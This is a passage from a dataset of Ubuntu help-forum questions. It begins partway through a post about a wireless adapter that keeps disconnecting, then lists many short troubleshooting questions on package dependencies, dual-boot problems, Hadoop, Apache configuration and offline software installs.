0 ppdev 17106 0 bnep 18258 2 rfcomm 47863 12 binfmt_misc 17540 1 arc4 12573 2 rt2800usb 27201 0 rt2x00usb 20857 1 rt2800usb rt2800lib 68029 1 rt2800usb rt2x00lib 55764 3 rt2x00usb , rt2800lib , rt2800usb coretemp 13596 0 mac80211 656164 3 rt2x00lib , rt2x00usb , rt2800lib kvm_intel 138733 0 kvm 452835 1 kvm_intel cfg80211 547224 2 mac80211 , rt2x00lib crc_ccitt 12707 1 rt2800lib ghash_clmulni_intel 13259 0 aesni_intel 55449 0 usb_storage 61749 1 aes_x86_64 17131 1 aesni_intel joydev 17613 0 xts 12922 1 aesni_intel nouveau 1001310 3 snd_hda_codec_hdmi 37407 1 lrw 13294 1 aesni_intel gf128mul 14951 2 lrw , xts mxm_wmi 13021 1 nouveau snd_hda_codec_realtek 46511 1 ablk_helper 13597 1 aesni_intel wmi 19256 2 mxm_wmi , nouveau snd_hda_intel 44397 5 ttm 88251 1 nouveau drm_kms_helper 49082 1 nouveau drm 295908 5 ttm , drm_kms_helper , nouveau snd_hda_codec 190010 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel cryptd 20501 3 ghash_clmulni_intel , aesni_intel , ablk_helper snd_hwdep 13613 1 snd_hda_codec snd_pcm 102477 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel btusb 18291 0 snd_page_alloc 18798 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 i2c_algo_bit 13564 1 nouveau snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30417 1 snd_seq_midi snd_seq 61930 2 snd_seq_midi_event , snd_seq_midi bluetooth 251354 22 bnep , btusb , rfcomm snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi lpc_ich 17060 0 snd_timer 29989 2 snd_pcm , snd_seq mei 46588 0 snd 69533 20 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device psmouse 97838 0 microcode 22923 0 soundcore 12680 1 snd video 19467 1 nouveau mac_hid 13253 0 serio_raw 13215 0 lp 17799 0 parport 46562 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 47346 0 hid 101248 2 hid_generic , usbhid ahci 30063 3 libahci 32088 1 ahci e1000e 207005 0 ptp 18668 1 e1000e pps_core 14080 1 ptp sudo lshw -c network 00:00.0 host bridge : intel corporation haswell dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation haswell pci express x16 controller ( rev 06 ) 00:14.0 usb controller : intel corporation lynx point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation ethernet connection i217-v ( rev 04 ) 00:1a.0 usb controller : intel corporation lynx point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point pci express root port # 1 ( rev d4 ) 00:1c.2 pci bridge : intel corporation 82801 pci bridge ( rev d4 ) 00:1d.0 usb controller : intel corporation lynx point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point 6-port sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf119 [ geforce gt 610 ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gf119 hdmi audio controller ( rev a1 ) 03:00.0 pci bridge : asmedia technology inc. asm1083/1085 pcie to pci bridge ( rev 03 ) sudo iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on sudo iwlist scan eth0 interface does n't support scanning . lo interface does n't support scanning . wlan0 no scan results note : this dmesg was done after a reboot where the network manager was continuously displaying the `` disconnected '' message over and over . so it must have been trying to connect at this time . my network was displayed in the list of options , as the only option despite other devices picking up 12+ access points . the router channel is set to auto . dmesg | tail -30 [ 187.418446 ] wlan0 : associated [ 190.405601 ] wlan0 : disassociated from 00:14 : d1 : a8 : c3:44 ( reason : 15 ) [ 190.443312 ] cfg80211 : calling crda to update world regulatory domain [ 190.443431 ] wlan0 : deauthenticating from 00:14 : d1 : a8 : c3:44 by local choice ( reason=3 ) [ 190.451635 ] cfg80211 : world regulatory domain updated : [ 190.451643 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 190.451648 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 190.451652 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 190.451656 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 190.451659 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 190.451662 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 191.824451 ] wlan0 : authenticate with 00:14 : d1 : a8 : c3:44 [ 191.850608 ] wlan0 : send auth to 00:14 : d1 : a8 : c3:44 ( try 1/3 ) [ 191.884604 ] wlan0 : send auth to 00:14 : d1 : a8 : c3:44 ( try 2/3 ) [ 191.886309 ] wlan0 : authenticated [ 191.886579 ] rt2800usb 3-5.3:1.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 191.886588 ] rt2800usb 3-5.3:1.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 191.889556 ] wlan0 : associate with 00:14 : d1 : a8 : c3:44 ( try 1/3 ) [ 192.001493 ] wlan0 : associate with 00:14 : d1 : a8 : c3:44 ( try 2/3 ) [ 192.040274 ] wlan0 : rx assocresp from 00:14 : d1 : a8 : c3:44 ( capab=0x431 status=0 aid=3 ) [ 192.044235 ] wlan0 : associated [ 193.948188 ] wlan0 : deauthenticating from 00:14 : d1 : a8 : c3:44 by local choice ( reason=3 ) [ 193.981501 ] cfg80211 : calling crda to update world regulatory domain [ 193.984080 ] cfg80211 : world regulatory domain updated : [ 193.984082 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 193.984084 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 193.984085 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 193.984085 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 193.984086 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 193.984087 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) the router uses mac filtering , and security is wpa psk with cipher as auto . so , any ideas ? or is the solution just to not use 13.04 unless you have a wired connection ? ( i do n't have this option . ) if so , please just tell me straight . i survived 9.04 jaunty , and i can survive 13.04 raring . update # 1 results from trying wild man 's first answer : jii @ conan : ~ $ echo `` options rt2800usb nohwcrypt=y '' | sudo tee /etc/modprobe.d/rt2800usb.conf options rt2800usb nohwcrypt=y jii @ conan : ~ $ sudo modprobe -rfv rt2800usb rmmod rt2800usb rmmod rt2800lib rmmod crc_ccitt rmmod rt2x00usb rmmod rt2x00lib rmmod mac80211 rmmod cfg80211 jii @ conan : ~ $ sudo modprobe -v rt2800usb insmod /lib/modules/3.10.0-031000-generic/kernel/lib/crc-ccitt.ko insmod /lib/modules/3.10.0-031000-generic/kernel/net/wireless/cfg80211.ko insmod /lib/modules/3.10.0-031000-generic/kernel/net/mac80211/mac80211.ko insmod /lib/modules/3.10.0-031000-generic/kernel/drivers/net/wireless/rt2x00/rt2x00lib.ko insmod /lib/modules/3.10.0-031000-generic/kernel/drivers/net/wireless/rt2x00/rt2800lib.ko insmod /lib/modules/3.10.0-031000-generic/kernel/drivers/net/wireless/rt2x00/rt2x00usb.ko insmod /lib/modules/3.10.0-031000-generic/kernel/drivers/net/wireless/rt2x00/rt2800usb.ko nohwcrypt=y i tried : gksudo gedit /etc/pm/power.d/wireless but i did n't have the package . it said to install gksu . i tried that , but of course , not having internet , i did n't get the package . so instead i did : sudo gedit /etc/pm/power.d/wireless which created the file . here is the body : # ! /bin/sh /sbin/iwconfig wlan0 power off i then rebooted . no change . i tried adding exit 0 to the bottom of the wireless file , and rebooted . no change . please note that this is a desktop machine . i 'm assuming power management is primarily for laptops , but the iwconfig does state that power management is on , so who knows . the recommended router changes i did not do , since the current router settings are ( i think ) required for some of the older devices i have , and because the current settings work on all my modern devices including ubuntu 12.04 and windows 7 . i do appreciate the advice though , and i 'll look into it when i have time . anything else to try ? update # 2 i booted into ubuntu 12.04.3 from a dvd , and the same problems exist . i have a separate old desktop machine with 12.04 installed that has no wireless problems at all . so obviously the problem is wireless hardware compatibility in both 12.04.03 lts and 13.04 . update # 3 the same problems exist even when using a wired connection . i plugged an ethernet cable directly to the router and the network manager added an `` auto ethernet '' entry , but it can not establish a connection to it . so the problem is not specific to wireless . meanwhile , i purchased a trendnet n300 wireless usb adapter , tew-664ub . i plugged it in , but i have no idea how to get ubuntu to try and use it . can anyone tell me how ? can i download a package on another computer and copy the .deb over to do an install , etc ? i 'm installing windows 7 to double check that the internet connection works there and it 's not just some magically faulty hardware . thanks for your help .
337779	stuffs are opening by itself	i am using ubuntu for a few months and i am living a real computer experience actually : ) but i have a problem , too . for example when i start ubuntu , at the first minutes , if i select a photo , folder or just move the mouse on a button , stuffs like these things are opening by itself , instantly and and a dozens of ... then a few minutes later , i do n't know why , it 's not gon na happen anymore . i guess this is because of a software that i downloaded recently , because this issue started a few days ago . how can i fix that ? thanks advance . r覺za .
337780	why autoremove is not called whenever i remove a package ?	man apt-get says : autoremove is used to remove packages that were automatically installed to satisfy dependencies for other packages and are now no longer needed . so why is it not automatically called every time i remove package ? edit essentially , my question is : why use remove < pkg name > and not autoremove < pkg name > to remove packages . see here ps : this wo n't break dependency as said here
337785	wireless not working on toshiba satellite c55-a5281	the wireless does n't work on my toshiba satellite c55-a5281 . the device originally came with windows 8 , but i removed it snd installed ubuntu . wireless does not work `` out of the box '' and there are no proprietary drivers to enable in the manager . wired connection however does work , along with the keyboards and it 's functions-brightness , sound , etc . i posted about this in the forum last-week , but no other people were able to help . http : //ubuntuforums.org/showthread.php ? t=2168927
337791	crossover install looking for cd but i installed with usb flash drive	when i try to install crossover , the sofware center instructs me to place ubuntu cd in drive and then continue . as i installed ubuntu via usb flash drive , i have nothing to put in cd drive . how can i have the software center use the usb drive ?
337794	ubuntu 13.04 installation error and data loss	i am completely new to ubuntu . i have a dell studio 1555 laptop . i had windows 7 ultimate ( 64-bit ) installed onto it and it was the only os . in windows , my 250-gb hard disk was partitioned only into drive c ( where windows was installed ) and drive d. recently , i installed ubuntu 13.04 via a pen drive ; i performed a clean install . my aim was to be able to use windows 7 and ubuntu 13.04 both as and when required wherein i expected to get a screen that asks me to choose between the two when i boot the laptop . i had done the same on my desktop and it worked fine . however , on my laptop , when i choose windows 7 at the screen where i am supposed to choose between ubuntu 13.04 and windows 7 , it does n't boot up , saying `` windows 7 can not start because of some recent software or hardware changes '' . they ask me to use the windows installation disc and repair my computer . when i did that ( using the installing windows through usb method ) , there was no option to `` repair your computer '' , which i think indicates that it does n't detect the already installed windows . i do n't remember what exactly is it that i did wrong while installing ubuntu but i remember not selecting `` overwrite '' or `` erase disk '' , because i wanted my windows data to remain intact . also , i think i must have installed ubuntu in the same drive as windows ( drive c ) and that my `` home '' , `` root '' , `` bin '' , `` boot '' are in the same drive because in ubuntu the only device i see under `` devices '' is `` computer '' with all the aforementioned folders . ubuntu works just fine . however , i ca n't find my windows data anywhere ! almost all the data was in drive d with only programs installed in c. i do n't mind losing the application programs but my drive d contained some very important data . i searched the forums for a solution but for fear of making the problem completely irrepairable , i did n't try most of the stuff . i just need to access the data so that i can copy it onto my desktop and perform clean installations of ubuntu and windows 7 again . i do n't know if this will help : paste.ubuntu.com/5794687 thank you !
337808	should i run 'ntpdate ' regularly or should i use the ntp service ?	i think there are two solutions for keeping the time in sync on my machine . one is to run an ntp service , another is to run the ntpdate regularly by putting it in a crontab . this is how i understand it - is it correct ? if yes , which solution is better ?
337821	apt-get install -f seems to purge too much	i 've been trying to install skype to the 12.04 64bit . installing ai32-libs doesnt work at all ( something about held packages and none of recommendations has n't helped ) . i 've installed package somehow ( dpkg probably ) , but it still doesnt work . but now something is broken with dependenses , and install -f causes purge of those packages : the following packages were automatically installed and are no longer required : linux-headers-3.2.0-37 python-routes libchm1 linux-headers-3.2.0-37-generic libpodofo0.9.0 python-cherrypy3 python-dnspython python-mechanize python-webob python-beautifulsoup python-cssutils libssl1.0.0 : i386 zlib1g : i386 to remove them , use the «apt-get autoremove» . will be installed the following additional packages : libssl1.0.0 : i386 zlib1g : i386 the packages will be removed : appmenu-qt calibre calibre-bin checkbox-qt intel-gpu-tools libdbusmenu-qt2 libdconf-qt0 libgl1-mesa-dri libqt4-dbus libqt4-declarative libqt4-designer libqt4-help libqt4-network libqt4-opengl libqt4-script libqt4-scripttools libqt4-sql libqt4-sql-sqlite libqt4-svg libqt4-xml libqt4-xmlpatterns libqtassistantclient4 libqtbamf1 libqtdee2 libqtgconf1 libqtgui4 libqtwebkit4 libunity-2d-private0 libutouch-geis1 libva-x11-1 libxcb-composite0 libxcb-keysyms1 libxcb-randr0 libxcb-xv0 lightdm pulseaudio-module-x11 python-qt4 qdbus qt-at-spi radeontool skype : i386 sni-qt ubuntu-desktop ubuntu-sso-client-qt ubuntuone-control-panel-qt unity-2d unity-2d-panel unity-2d-shell unity-2d-spread virtualbox-4.2 vlc xdiagnose xorg xserver-xorg-video-all xserver-xorg-video-ati xserver-xorg-video-radeon new packages will be installed : libssl1.0.0 : i386 zlib1g : i386i xserver-xorg-video-radeon here is apt-get check output : the following packages have unmet dependencies : skype : i386 : depends : libasound2 : i386 ( > = 1.0.23 ) but it is not installed depends : libqt4-dbus : i386 ( > = 4:4.5.3 ) but it is not installed depends : libqt4-network : i386 ( > = 4:4.8.0 ) but it is not installed depends : libqt4-xml : i386 ( > = 4:4.5.3 ) but it is not installed depends : libqtcore4 : i386 ( > = 4:4.7.0 ~ beta1 ) but it is not installed depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not installed depends : libqtwebkit4 : i386 ( > = 2.2 ~ 2011week36 ) but it is not installed depends : libx11-6 : i386 but it is not installed depends : libxext6 : i386 but it is not installed depends : libxss1 : i386 but it is not installed depends : libxv1 : i386 but it is not installed depends : libssl1.0.0 : i386 but it is not installed recommends : sni-qt : i386 but it is not installed recommends : libasound2-plugins : i386 but it is not installed what should i try ? i do n't want to uninstall that all .
337825	hadoop : datanode not running ?	i configured and deployed hadoop for single node setup via this tutorial . everything deployed fine , but when i do jps for have a look on active processes , datanode is not shown . i manually tried to start datanode by going to $ hadoop_home/bin : hadoop -datanode , but to no avail . basically to sum up , datanode process is not running at all for the hadoop cluster . also , i want to know whether a single machine can have 2 hadoop installations . i am using one for mapreduce processes and another one for search engine . ? so their directory being different , is that okay ? also , i run a single hadoop operation at a time . edit 1 # : - if this helps , here 's the log when i tried running datanode via $ hadoop_home . root @ thinktank : /usr/local/hadoop/bin # hadoop datanode warning : $ hadoop_home is deprecated . 13/08/27 16:34:57 info datanode.datanode : startup_msg : /************************************************************ startup_msg : starting datanode startup_msg : host = thinktank/127.0.1.1 startup_msg : args = [ ] startup_msg : version = 1.2.1 startup_msg : build = https : //svn.apache.org/repos/asf/hadoop/common/branches/branch-1.2 -r 1503152 ; compiled by 'mattf ' on mon jul 22 15:23:09 pdt 2013 startup_msg : java = 1.6.0_27 ************************************************************/ 13/08/27 16:34:57 info impl.metricsconfig : loaded properties from hadoop-metrics2.properties 13/08/27 16:34:57 info impl.metricssourceadapter : mbean for source metricssystem , sub=stats registered . 13/08/27 16:34:57 info impl.metricssystemimpl : scheduled snapshot period at 10 second ( s ) . 13/08/27 16:34:57 info impl.metricssystemimpl : datanode metrics system started 13/08/27 16:34:57 info impl.metricssourceadapter : mbean for source ugi registered . 13/08/27 16:34:57 warn impl.metricssystemimpl : source name ugi already exists ! 13/08/27 16:34:57 error datanode.datanode : java.io.ioexception : incompatible namespaceids in /app/hadoop/tmp/dfs/data : namenode namespaceid = 1955988395 ; datanode namespaceid = 1705269445 at org.apache.hadoop.hdfs.server.datanode.datastorage.dotransition ( datastorage.java:232 ) at org.apache.hadoop.hdfs.server.datanode.datastorage.recovertransitionread ( datastorage.java:147 ) at org.apache.hadoop.hdfs.server.datanode.datanode.startdatanode ( datanode.java:414 ) at org.apache.hadoop.hdfs.server.datanode.datanode. < init > ( datanode.java:321 ) at org.apache.hadoop.hdfs.server.datanode.datanode.makeinstance ( datanode.java:1712 ) at org.apache.hadoop.hdfs.server.datanode.datanode.instantiatedatanode ( datanode.java:1651 ) at org.apache.hadoop.hdfs.server.datanode.datanode.createdatanode ( datanode.java:1669 ) at org.apache.hadoop.hdfs.server.datanode.datanode.securemain ( datanode.java:1795 ) at org.apache.hadoop.hdfs.server.datanode.datanode.main ( datanode.java:1812 ) 13/08/27 16:34:57 info datanode.datanode : shutdown_msg : /************************************************************ shutdown_msg : shutting down datanode at thinktank/127.0.1.1 ************************************************************/
337829	web browsers are not working from gui but running from terminal with sudo	i am not able to get internet through firefox or any other browser from gui ( as normal user ) . but when i 'm opening firefox from terminal with sudo then internet is working absolutely fine . talking of internet access i 'm able to download any software from ubuntu software centre from gui .
337830	ubuntu 12.04 with linux 3.5.0-39-generic has issues booting	i 've been trying to get this working for days now and none of the posts i 've found on this site ( or any other ) have been able to help me fix this , so sorry if this is a repost . i 'm currently trying to dual-boot windows 7 and ubuntu on a desktop with a gigabyte z87n motherboard and an nvidia gtx760 video card . when i try to boot ubuntu `` normally '' ( not in recovery mode ) i 'm left with a blank screen with a blinking underscore . if i try to run in recovery mode , then i get a lot of text output and then this : [ 4.429609 ] [ drm : drm_pci_agp_init ] *error* can not initialize the agpgart module . [ 4.429667 ] drm : fill_in_dev failed . the system always comes to a complete halt ( and again a blinking underscore at the bottom of the screen ) after those two lines print . sometimes , more lines print after that , but they always vary and dont seem to be part of the problem ( they seem to just be normal messages about other drivers loading ) . i followed these instructions to install my nvidia drivers . but that did n't work ( obviously ) . pleeaaase help me . i know that the two error messages above have been addressed before , but i have n't found any fixes that work . i 've tried to boot with the `` nomodeset '' option but that does n't seem to change anything . i 've also tried to boot with `` text nomodeset '' and gotten the same results . i forgot to mention that this all happens when i use the hdmi port on my graphics card . if i use the hdmi port on my motherboard , ubuntu boots just fine . another interesting thing i noted is that i do n't see the motherboard logo or the grub menu ( where i choose between ubuntu and windows ) if i use the motherboard 's hdmi . the screen just stays completely black until i see the ubuntu login page . also , i have an entry in grub called `` previous linux versions '' which lets me boot into linux 3.5.0-23-generic . i would boot into recovery mode here before and it used to work , but for some reason even that does n't work now . sorry for the unorganized post ... i 'm not sure how to organize all this random info that i have . please let me know if you need any more information , and thanks in advance if you can help me !
337835	nx client windows	i have nx client installed on my windows 7 and ubuntu 13.04 systems . settings for nxclient in windows : correct ip/port desktop : gnome display available area my ubuntu 13.04 system with nxclient is on an asus eee pc 901 . also installed are : openssh nxclient nxnode nxserver so the issue i get is : it does not load desktop environment . i 'm able to connect to the computer and get command line via putty.exe . i was able to get desktop environment when i installed xubuntu and changed node.cfg commented out # commandstartgnome = `` /etc/x11/xsession gnome-session with commented out # commandstartgnome = `` /usr/bin/startxfce4 '' / what am i doing wrong ?
337842	i want to delete ubuntu from the partition on my mac , but i can not access my mac os system	i made a partition on my imac to install ubuntu , which i did by dvd . i 've been using it for a while but , i wanted to switch over to my mac os and when i restart my comp and hold down the `` alt '' button a purple screen comes up and gives me the option of picking ubuntu or mac os using the arrow keys on my keyboard , but they wo n't move up or down for me and after 10 seconds it goes into ubuntu . any advice would be greatly appreciated !
337843	using lvm2 raid on ubuntu 12.04 lts	i would like to use lvm2 's built-in raid support ( lvconvert -m1 -- type raid1 vgname/lvname ) on my ubuntu 12.04 lts server . unfortunately this feature appeared in lvm2 2.02.89 ( assuming i 've read the changelog correctly ) , while ubuntu 12.04 has lvm2 2.02.66 . what are my options ? is there a backport of newer lvm2 somewhere ? will a newer lvm2 package require a newer kernel than the one in 12.04 , or are these features managed in userspace somehow ?
337844	how to create partition from running onepartition ?	hello i am new in ubuntu . while setuping ubuntu i pressed replace windows 8 and it did . but the problem is it also deleted other partition . now is there any way to slice my one partition into 2 pieces ? i have 320gb hdd so i want to use 50gb for ubuntu and others for file storage . and is there anyway to recover the datas that got deleted during installation ? i will be glad if somebody help me out
337846	how to fix kernel panic with read/write error ?	whenever i start my computer it first says `` error attempt to read or write out of partition '' . then on another screen it says : [ 1.378476 ] kernel panic - not syncing : vfs : unsble to mount root fs on unknown block ( 0,0 ) . specs that i know of : a midrange asus laptop with an amd a6 vision processor , radeon graphics hd 6520g graphics card . this is pretty urgent because i 'm about to start school in about a week so assistance would be very nice . i installed ubuntu from a dvd and at first it worked just fine until i had to restart it for some changes to take place then this happened . i tried doing a memory test but then after 13 hours it said there was no errors so i stopped it .
337852	install electum ( btc ) on offline live usb	i would like to install the bitcoin client electrum on an offline live usb drive . this would help to create and restore wallets most securely . the install instructions are as follows : install python-qt4 and pip : sudo apt-get install python-qt4 python-pip install electrum : sudo pip install http : //download.electrum.org/electrum-1.8.1.tar.gz # md5=dc9f4b1cb38bd1d152be83d0a430cf62 run : electrum what would be the way to do this offline ? edit : the packages can obviously be downloaded and copied to the usb drive . however , i ca n't get python-qt4 to install . there is a related question , but i do n't understand how to go through this .
337854	how to troubleshoot slow web browsing in ubuntu vbox guest ( windows host ) ?	i have an ubuntu 12.04 lts virtualbox guest running on a windows 7 host . until recently it had been working flawlessly1 . since a few days ago , however , web browsing in this ubuntu vbox has been extremely slow ( so much so that many pages never finish loading ) . this sluggishness is confined to the ubuntu vbox ; i experience no slowdown at all in the windows host . ( this rules out server-side problems and problems with the internet connection . ) i have reason to believe that the problem has to do with the ubuntu vbox 's dns resolution , because the sluggishness started right after i had to run sudo dpkg-reconfigure resolvconf . i posted a question about this at that time . that said , i ca n't figure out what i could have broken by doing this , since , besides answering 'yes ' in the dpkg-reconfigure resolvconf dialog ( described in that earlier question ) , i did not make any other changes to my dns resolution configuration . in any case , it was after doing this sudo dpkg-reconfigure resolvconf and rebooting the ubuntu vbox , that i noticed that web browsing had become , on average , very slow . a typical experience is that , using firefox ( for example ) i do a google search ( which is usually reasonably quick2 ) , then i click on any one of the top hits , and then the looong wait begins . this wait is long enough that , before it 's over , i have time to switch to the windows 7 host , repeat the same google search ( using firefox again ) , click on the same hit that i 'd just clicked while in the ubuntu guest , instantly retrieve the desired , read whatever i needed to read , and switch back to the ubuntu guest . ( if nothing else , this confirms that whatever the problem is , it is confined to the current configuration of the ubuntu guest . ) how can i troubleshoot this problem further ( and hopefully fix it ) ? 1 as an aside , let me express my admiration for virtualbox . wow , what an impressive piece of software ! 2 interestingly , the first few google searches i did after reconfiguring resolvconf and rebooting were slow-as-molasses , but eventually they got faster . my guess is that ( consistent with my suspicions of the current dns setup ) this observed speed-up is due to caching of some key ip addresses .
337856	ubuntu installation alongside windows	i am new to ubuntu and i have recently burned an ubuntu .iso file on to a dvd and booted in to ubuntu . my disk is 80gib and it is already partitioned in 2 parts . c : where the windows is installed , this is 65gib , and the second partition is 15gib . i want to install ubuntu alongside windows 7 and preferably in the second partition ( 15gb ) . which option should i choose ? `` install alongside windows . '' or the manual install or something else ?
337859	how to create a button event on ubuntu sdk	i 've downloaded the ubuntu sdk to create apps in my spare time , and i 've started converting a console app of a binary converter i made to one with a gui . so i 've dropped the edits , buttons and what not but for my one button that converts i do n't know how to make the event . i 've tried double clicking ( which works in so many other rad environments ) but in this it just goes to change the properties of the button . i 've looked around on the menus and drop downs but ca n't find anything . all help is appreciated , thank you . ps : this is in fact a desktop application not a mobile one .
337860	files saved with ubuntu is not visible in windows 8	i have dual booted my laptop with ubuntu 12.10 and windows 8 . when i download some file via ubuntu ( e.g a pdf ) and save it on a windows partition ( ntfs ) , i do not see it through windows 8 . even when i set to view hidden files , the files do not appear . but when i boot with ubuntu i see the file is there . what is the issue here . this is not a very good experience for me . please let me know how to fix the issue .
337861	why there are many guest accounts on my system ?	after i saw this answer , i realized that there are many guest accounts on my system : grep guest /etc/passwd guest-jzxerx : x:117:127 : guest , , , :/tmp/guest-jzxerx : /bin/false guest-l5dapu : x:118:128 : guest , , , :/tmp/guest-l5dapu : /bin/false guest-fdsakw : x:119:129 : guest , , , :/tmp/guest-fdsakw : /bin/false guest-ebu0cu : x:121:131 : guest , , , :/tmp/guest-ebu0cu : /bin/false moreover , in this moment there is nobody logged as guest , but if somebody will login as guest , a new guest account is created - why , since there are already other guest accounts ? after the new guest will log out , his account will be deleted . but why the other guest accounts remain ? for what use/purpose ? it does n't mind me at all this guest account , but i want to know if it is okay to delete them manually .
337870	no application switcher in fullscreen ?	hi is it a bug or was it actually designed so ? when an application is in fullscreen and i hit 'alt-tab ' the applications that would normaly show are hidden . any idea on how to fix this ? if possible at all . thanks
337873	all main terminal commands on ubuntu 12.04	what should i write in terminal to see all main commands ? ( i 'm using ubuntu 12.04 . )
337874	change apache document root folder to secondary hard drive	i installed the ubuntu 12.04 server edition for my server pc . i had installed lamp server . i need to change the var/www location to my secondary hard disk location . i was configured so many time to at gedit /etc/apache2/sites-available/default here is my code < virtualhost *:80 > serveradmin webmaster @ localhost # documentroot /var/www documentroot /media/myserver/ < directory / > options followsymlinks allowoverride none < /directory > # < directory /var/www/ > < directory /media/myserver/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > and also used sudo chown -r var/www /media/myserver/ and chmod -r 755 /media/myserver/ still i was not able to connect my /media/myserver and my browser show the following message forbidden you do n't have permission to access / on this server . please tell anyone how to mount myserver at my var/www , thanks advance
337880	perl dependancy problems installing webmin	i just installed webmin from a .deb file . on ubuntu server 12.04 , which went ok . i logged in at the web interface and checked the `` perl modules '' page . there was on module suggested but not installed . i selected it and pressed install and got the following error : making , testing and installing authen : :libwrap .. untarring module file executing gunzip -c /tmp/.webmin/authen-libwrap-0.22.tar.gz | tar xvf - .. authen-libwrap-0.22 authen-libwrap-0.22/build.pl authen-libwrap-0.22/changelog authen-libwrap-0.22/example.pl authen-libwrap-0.22/makefile.pl authen-libwrap-0.22/manifest authen-libwrap-0.22/meta.yml authen-libwrap-0.22/ppport.h authen-libwrap-0.22/readme authen-libwrap-0.22/lib authen-libwrap-0.22/lib/authen authen-libwrap-0.22/lib/authen/libwrap.pm authen-libwrap-0.22/lib/authen/libwrap.xs authen-libwrap-0.22/t authen-libwrap-0.22/t/01_inline.t authen-libwrap-0.22/t/02_maintainer.t authen-libwrap-0.22/t/03_pod.t authen-libwrap-0.22/t/hosts.allow compiling module executing /usr/bin/perl makefile.pl & & make .. # running build.pl enter include directory to use : [ /usr/include ] /usr/include enter library directory to use : [ /usr/lib ] /usr/lib warning : extutils : :cbuilder not installed or no compiler detected proceeding with configuration , but compilation may fail during build created mymeta.yml and mymeta.json creating new 'build ' script for 'authen-libwrap ' version '0.22' /usr/bin/perl build -- makefile_env_macros 1 building authen-libwrap error : function definition too short '/ * eof * / ' in libwrap.xs , line 32 error : no compiler detected to compile 'lib/authen/libwrap.c ' . aborting make : *** [ all ] error 255 installation of authen : :libwrap failed . check the output above and try installing manually . you can also install the module from cpan with the command perl -mcpan -e shell . i 've installed extutils : :cbuilder successfully i think from the cpan command line but still i get the same error when installing 'authen-libwrap ' . can anyone help please ?
